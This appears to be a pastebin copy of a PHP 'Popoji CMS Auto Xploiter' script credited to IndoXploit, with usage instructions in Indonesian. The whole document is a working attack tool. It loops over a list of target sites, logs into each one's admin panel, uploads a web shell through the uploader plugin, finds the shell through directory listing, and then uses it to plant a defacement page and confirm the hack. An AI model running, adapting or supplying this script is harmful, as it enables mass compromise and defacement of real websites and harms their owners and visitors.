SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | set_time_limit(0); | |
3 | error_reporting(0); | |
4 | ||
5 | function login($url,$user,$pass) { | |
6 | $post_login = array( | |
7 | "mod" => "login", | |
8 | "act" => "proclogin", | |
9 | "username" => $user, | |
10 | "password" => $pass, | |
11 | ); | |
12 | $ch = curl_init(); | |
13 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
14 | curl_setopt($ch, CURLOPT_URL, $url."/po-admin/login.php"); | |
15 | curl_setopt($ch, CURLOPT_POST, true); | |
16 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post_login); | |
17 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
18 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
19 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
20 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
21 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
22 | curl_setopt($ch, CURLOPT_COOKIESESSION, true); | |
23 | return curl_exec($ch); | |
24 | curl_close($ch); | |
25 | } | |
26 | function ch($url,$post) { | |
27 | $ch = curl_init($url); | |
28 | if($post !=null) { | |
29 | curl_setopt($ch, CURLOPT_POST, true); | |
30 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); | |
31 | } | |
32 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
33 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
34 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
35 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
36 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
37 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
38 | return curl_exec($ch); | |
39 | curl_close($ch); | |
40 | } | |
41 | function cek($url) { | |
42 | $ch = curl_init($url); | |
43 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
44 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
45 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
46 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
47 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
48 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
49 | return curl_exec ($ch); | |
50 | curl_close($ch); | |
51 | } | |
52 | function cover() { | |
53 | echo "<--------------------><-------------------->\n"; | |
54 | echo "[ Popoji CMS Auto Xploiter ]\n"; | |
55 | echo "// Coded by Mr. Error 404 ft. tu5b0l3d - IndoXploit //\n"; | |
56 | echo "cara pake: php popoji.php [list_target.txt] [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n"; | |
57 | echo "contoh: php popoji.php target.txt indoxloit.jpg indoxploit.php deface.html\n"; | |
58 | echo "<--------------------><-------------------->\n\n\n"; | |
59 | } | |
60 | $username_popoji = "indoxploit"; // ganti dengan username kalian. | |
61 | $password_popoji = "indoxploit"; // ganti dengan paasword kalian. | |
62 | $sites = explode("\n", file_get_contents($argv[1])); | |
63 | $shell = $argv[2]; | |
64 | $nama_shell = $argv[3]; | |
65 | $deface = $argv[4]; | |
66 | $pecah = explode(".", $nama_shell); | |
67 | $nama = $pecah[0]; | |
68 | $ext = $pecah[1]; | |
69 | if(isset($sites) AND isset($shell) AND isset($nama_shell) AND isset($deface)) { | |
70 | cover(); | |
71 | foreach($sites as $url) { | |
72 | echo "[+] Nyecan: $url\n"; | |
73 | $login = login($url, $username_popoji, $password_popoji); | |
74 | if(preg_match("/beranda|keluar|selamat datang|member|admin/i", $login)) { | |
75 | echo "[+] Login OK\n"; | |
76 | $post_upload = array( | |
77 | "file" => "@$shell", | |
78 | "name" => $nama_shell, | |
79 | ); | |
80 | ch($url."/po-admin/js/plugins/uploader/upload.php", $post_upload); | |
81 | $cek_folder = cek("$url/po-content/po-upload/"); | |
82 | if(preg_match("/Index of \/po-content\/po-upload/", $cek_folder) AND !preg_match("/403/", $cek_folder)) { | |
83 | preg_match("/<li><a href=\"$nama-(.*?)-polibrary.$ext\">/", $cek_folder, $shellmu); | |
84 | $shellmu[1] = "$nama-".$shellmu[1]."-polibrary.$ext"; | |
85 | $link_shell = $url."/po-content/po-upload/".$shellmu[1]; | |
86 | echo "[+] Shellmu: $link_shell\n"; | |
87 | $post_deface = array( | |
88 | "tipe_upload" => "home_root", | |
89 | "ix_file" => "@$deface", | |
90 | "upload" => "upload", | |
91 | ); | |
92 | $depes = ch($link_shell."?do=upload", $post_deface); | |
93 | if(preg_match("/uploaded!/i", $depes) AND preg_match("/hacked/i", cek("$url/$deface"))) { | |
94 | echo "[+] Sukses Depes! -> $url/$deface\n\n"; | |
95 | } else { | |
96 | echo "[-] Gagal Depes!!\n\n"; | |
97 | } | |
98 | } else { | |
99 | echo "[+] Lokasi Shellnya forbidden / kena tebas gann :(\n\n"; | |
100 | } | |
101 | } else { | |
102 | echo "[+] Login Gagal\n\n"; | |
103 | } | |
104 | } | |
105 | } else { | |
106 | echo "cara pake: php ".$argv[0]." [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n"; | |
107 | echo "contoh: php ".$argv[0]." shell.jpg indoxploit.php deface.html\n"; | |
108 | } | |
109 | ?> |